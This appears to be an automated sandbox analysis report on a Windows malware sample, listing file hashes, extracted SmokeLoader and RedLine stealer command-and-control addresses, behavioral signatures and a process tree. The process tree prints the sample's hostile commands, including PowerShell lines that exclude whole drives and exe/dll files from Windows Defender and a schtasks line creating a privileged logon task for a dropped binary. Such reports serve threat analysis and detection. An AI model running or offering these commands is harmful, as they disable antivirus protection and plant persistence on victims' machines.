Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
15-04-2022 14:08
General
-
Target
487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb.exe
-
Size
528KB
-
MD5
0a812a69a1080234c0a1c9f92512be4d
-
SHA1
2865d6f4bf0dcfbc971f4d96bd1048534e0e18c5
-
SHA256
487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb
-
SHA512
a021786d2e2a5b983fbbed5e54013ccc3ac7926a6f9a12ff06d20e72e779698e5f17eeb73fbef77b3bcca3a1530be6ff6284e0b1a68fe4d939ddaed3cf1790a2
Malware Config
Extracted
smokeloader
2020
http://hydroxychl0roquine.xyz/
https://hydroxychl0roquine.xyz/
Extracted
redline
@ChelnEvreya
46.8.220.88:65531
-
auth_value
d24bb0cd8742d0e0fba1abfab06e4005
Signatures
-
Meta Stealer Stealer
Meta Stealer steals passwords stored in browsers, written in C++.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
-
VMProtect packed file 5 IoCs
Detects executables packed with VMProtect commercial packer.
-
Deletes itself 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb.exe"C:\Users\Admin\AppData\Local\Temp\487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb.exeC:\Users\Admin\AppData\Local\Temp\487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\58ED.exeC:\Users\Admin\AppData\Local\Temp\58ED.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4600 -s 9282⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\636E.exeC:\Users\Admin\AppData\Local\Temp\636E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\690C.exeC:\Users\Admin\AppData\Local\Temp\690C.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\7226.exeC:\Users\Admin\AppData\Local\Temp\7226.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services32.exe"4⤵
-
C:\Windows\system32\services32.exeC:\Windows\system32\services32.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"6⤵
- Executes dropped EXE
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Users\Admin\AppData\Roaming\vrhrvecC:\Users\Admin\AppData\Roaming\vrhrvec1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\vrhrvecC:\Users\Admin\AppData\Roaming\vrhrvec2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51ef6175e144b5c5d1e57768b1d5e0948
SHA1a950869bfad321f5de1b31e3fdaf1ecfdb968640
SHA256eac4bdf486a9496b6cf70aba2c2361b69cb7415658ab42d2309513b33ff93e31
SHA512c602d91079c5d3c3cef6ef4b2e1996f18c75ce7cc15017dd4480a859ff61a1748ebf96041c8de6cb22e175706c7fc66e3d0f25660dce6b804d265cb9ff212d56
-
Filesize
1KB
MD5faf1d7e26d9fa9d4c4fe90bda06f8deb
SHA10bcca845b0d37060ddf215ffdc0a757228fe8323
SHA25682d3455f54da5c0923b8a50498f9de6ba834bd5d1729d6b07f03f471edb98d69
SHA51239c4e9156ea1e01b05a4fcb1e50a27830bff94b0aefe6e56785ee09ef026586edbcf55edd5e2e28d4c4d4b66f1876b836886131799e1828a2f216d7645951da2
-
Filesize
1KB
MD5e620c7069167026039d75ddf279e7f85
SHA1f66aa460020ebc99416482b7769ad1577a1e2da7
SHA25642d60234f64338fb63ae4c18045ebee56bc4603948b75b616fa4fedf8a802928
SHA5123484b26441039c36e00613fecb5aa2a859864f2642f390554d8acb3a724ddbfaf9e15bd69bc4408de9313ee73640c753c21a66a1d8395528b06e0c261e24576d
-
Filesize
1KB
MD531391560f8d3a35b3b34c279fb736700
SHA17ea87589b13bd9d2b5f8c115819efc9e7152cad6
SHA2567326d2596c51fe91d0bca10b0b0ff0f9985e65f4873956f6eebdd77743de8fad
SHA512b66e512d03473516a01d34e10e92b21e8286dd76135de05d1b4a385810023422aced5ec32563674b8bd1d54d66402be6a8a2d2e6ba881712b024745fb9331906
-
Filesize
144KB
MD54cd86a72daa9201e19d2a1e202077b4b
SHA1bc10779f57796a4c110c96496b5e6b8c84e034d9
SHA25607133588c5d405ef1db9cbbaea74906f2aa599061a930c67b8c98c7322d760e5
SHA51247a39fb7308601ba21d8806125ad7fa4da954111843084dc1c910fa98d6f3dcb9d62810e69729fdc2a0611dddf37731663277a22034de57f6a5e62d795696074
-
Filesize
144KB
MD54cd86a72daa9201e19d2a1e202077b4b
SHA1bc10779f57796a4c110c96496b5e6b8c84e034d9
SHA25607133588c5d405ef1db9cbbaea74906f2aa599061a930c67b8c98c7322d760e5
SHA51247a39fb7308601ba21d8806125ad7fa4da954111843084dc1c910fa98d6f3dcb9d62810e69729fdc2a0611dddf37731663277a22034de57f6a5e62d795696074
-
Filesize
1.8MB
MD5da31f971f1f97923faf839a21b97c77e
SHA1605a73437a1ef081a1896f39abb47435b4db55bd
SHA25636f3b0d4c59f613a9590f90ff0cfea3281e7edcd69f25a82acef9b460fa5ce2f
SHA512dd5c326bb7bb594fa0745cd3b60cd301c1357fd740c5b7e45392beba6005c7b09b4838adb5849749777efee70e99b69437e4ab6d6b04b4d6d813793b0282a858
-
Filesize
1.8MB
MD5da31f971f1f97923faf839a21b97c77e
SHA1605a73437a1ef081a1896f39abb47435b4db55bd
SHA25636f3b0d4c59f613a9590f90ff0cfea3281e7edcd69f25a82acef9b460fa5ce2f
SHA512dd5c326bb7bb594fa0745cd3b60cd301c1357fd740c5b7e45392beba6005c7b09b4838adb5849749777efee70e99b69437e4ab6d6b04b4d6d813793b0282a858
-
Filesize
1.8MB
MD5da31f971f1f97923faf839a21b97c77e
SHA1605a73437a1ef081a1896f39abb47435b4db55bd
SHA25636f3b0d4c59f613a9590f90ff0cfea3281e7edcd69f25a82acef9b460fa5ce2f
SHA512dd5c326bb7bb594fa0745cd3b60cd301c1357fd740c5b7e45392beba6005c7b09b4838adb5849749777efee70e99b69437e4ab6d6b04b4d6d813793b0282a858
-
Filesize
1.8MB
MD5da31f971f1f97923faf839a21b97c77e
SHA1605a73437a1ef081a1896f39abb47435b4db55bd
SHA25636f3b0d4c59f613a9590f90ff0cfea3281e7edcd69f25a82acef9b460fa5ce2f
SHA512dd5c326bb7bb594fa0745cd3b60cd301c1357fd740c5b7e45392beba6005c7b09b4838adb5849749777efee70e99b69437e4ab6d6b04b4d6d813793b0282a858
-
Filesize
1.8MB
MD5da31f971f1f97923faf839a21b97c77e
SHA1605a73437a1ef081a1896f39abb47435b4db55bd
SHA25636f3b0d4c59f613a9590f90ff0cfea3281e7edcd69f25a82acef9b460fa5ce2f
SHA512dd5c326bb7bb594fa0745cd3b60cd301c1357fd740c5b7e45392beba6005c7b09b4838adb5849749777efee70e99b69437e4ab6d6b04b4d6d813793b0282a858
-
Filesize
1.8MB
MD5da31f971f1f97923faf839a21b97c77e
SHA1605a73437a1ef081a1896f39abb47435b4db55bd
SHA25636f3b0d4c59f613a9590f90ff0cfea3281e7edcd69f25a82acef9b460fa5ce2f
SHA512dd5c326bb7bb594fa0745cd3b60cd301c1357fd740c5b7e45392beba6005c7b09b4838adb5849749777efee70e99b69437e4ab6d6b04b4d6d813793b0282a858
-
Filesize
4.1MB
MD54d14241432efa5648f9e22b69841bed7
SHA13dd722344d425f2e0718b0971e49bd12db2b3b5f
SHA2561fe9afe5786cd151ce12756827fb2c87a75645809013546ccbf32fb649c21949
SHA512fc88b04da1b2004f568a8f674898fe96f4c0877d52e7c3bc743ddaa130b3041a8162c5fb1d610cbf1c1dad945d48b0a5e8cc305046405d5382048afff1d1184f
-
Filesize
4.1MB
MD54d14241432efa5648f9e22b69841bed7
SHA13dd722344d425f2e0718b0971e49bd12db2b3b5f
SHA2561fe9afe5786cd151ce12756827fb2c87a75645809013546ccbf32fb649c21949
SHA512fc88b04da1b2004f568a8f674898fe96f4c0877d52e7c3bc743ddaa130b3041a8162c5fb1d610cbf1c1dad945d48b0a5e8cc305046405d5382048afff1d1184f
-
Filesize
528KB
MD50a812a69a1080234c0a1c9f92512be4d
SHA12865d6f4bf0dcfbc971f4d96bd1048534e0e18c5
SHA256487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb
SHA512a021786d2e2a5b983fbbed5e54013ccc3ac7926a6f9a12ff06d20e72e779698e5f17eeb73fbef77b3bcca3a1530be6ff6284e0b1a68fe4d939ddaed3cf1790a2
-
Filesize
528KB
MD50a812a69a1080234c0a1c9f92512be4d
SHA12865d6f4bf0dcfbc971f4d96bd1048534e0e18c5
SHA256487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb
SHA512a021786d2e2a5b983fbbed5e54013ccc3ac7926a6f9a12ff06d20e72e779698e5f17eeb73fbef77b3bcca3a1530be6ff6284e0b1a68fe4d939ddaed3cf1790a2
-
Filesize
528KB
MD50a812a69a1080234c0a1c9f92512be4d
SHA12865d6f4bf0dcfbc971f4d96bd1048534e0e18c5
SHA256487eb4d42bee52098d2375e5d04e86f85c9addf15d2a969e5b7e61ef127340cb
SHA512a021786d2e2a5b983fbbed5e54013ccc3ac7926a6f9a12ff06d20e72e779698e5f17eeb73fbef77b3bcca3a1530be6ff6284e0b1a68fe4d939ddaed3cf1790a2
-
Filesize
9KB
MD51748663727fc9e74affd73d308f4f064
SHA187bb695048682d3a9b05e12728764fb6f2ab3aa5
SHA2567d0887fc729f5da04f84fc40dc782025401642ce47b960b710e96877c5cdcc36
SHA5120251b7ea43e3ca860e508f0509016a4a150e73400cd0ad240d5e52be92175e8bcbd318fa1d105714aab776800c3c0f9917684111e654507961afe99c49c0e096
-
Filesize
4.1MB
MD54d14241432efa5648f9e22b69841bed7
SHA13dd722344d425f2e0718b0971e49bd12db2b3b5f
SHA2561fe9afe5786cd151ce12756827fb2c87a75645809013546ccbf32fb649c21949
SHA512fc88b04da1b2004f568a8f674898fe96f4c0877d52e7c3bc743ddaa130b3041a8162c5fb1d610cbf1c1dad945d48b0a5e8cc305046405d5382048afff1d1184f
-
Filesize
9KB
MD51748663727fc9e74affd73d308f4f064
SHA187bb695048682d3a9b05e12728764fb6f2ab3aa5
SHA2567d0887fc729f5da04f84fc40dc782025401642ce47b960b710e96877c5cdcc36
SHA5120251b7ea43e3ca860e508f0509016a4a150e73400cd0ad240d5e52be92175e8bcbd318fa1d105714aab776800c3c0f9917684111e654507961afe99c49c0e096
-
Filesize
4.1MB
MD54d14241432efa5648f9e22b69841bed7
SHA13dd722344d425f2e0718b0971e49bd12db2b3b5f
SHA2561fe9afe5786cd151ce12756827fb2c87a75645809013546ccbf32fb649c21949
SHA512fc88b04da1b2004f568a8f674898fe96f4c0877d52e7c3bc743ddaa130b3041a8162c5fb1d610cbf1c1dad945d48b0a5e8cc305046405d5382048afff1d1184f
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
584KB
-
Filesize
784KB
-
Filesize
5.0MB
-
Filesize
192KB
-
Filesize
1.5MB
-
Filesize
40KB
-
Filesize
8.1MB
-
Filesize
72KB
-
Filesize
1.9MB
-
Filesize
8KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
136KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
24KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
36KB
-
Filesize
160KB
-
Filesize
8KB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
6.0MB
-
Filesize
1.0MB
-
Filesize
128KB
-
Filesize
72KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
408KB
-
Filesize
248KB
-
Filesize
300KB
-
Filesize
1.8MB
-
Filesize
5.2MB
-
Filesize
1.8MB
-
Filesize
1.8MB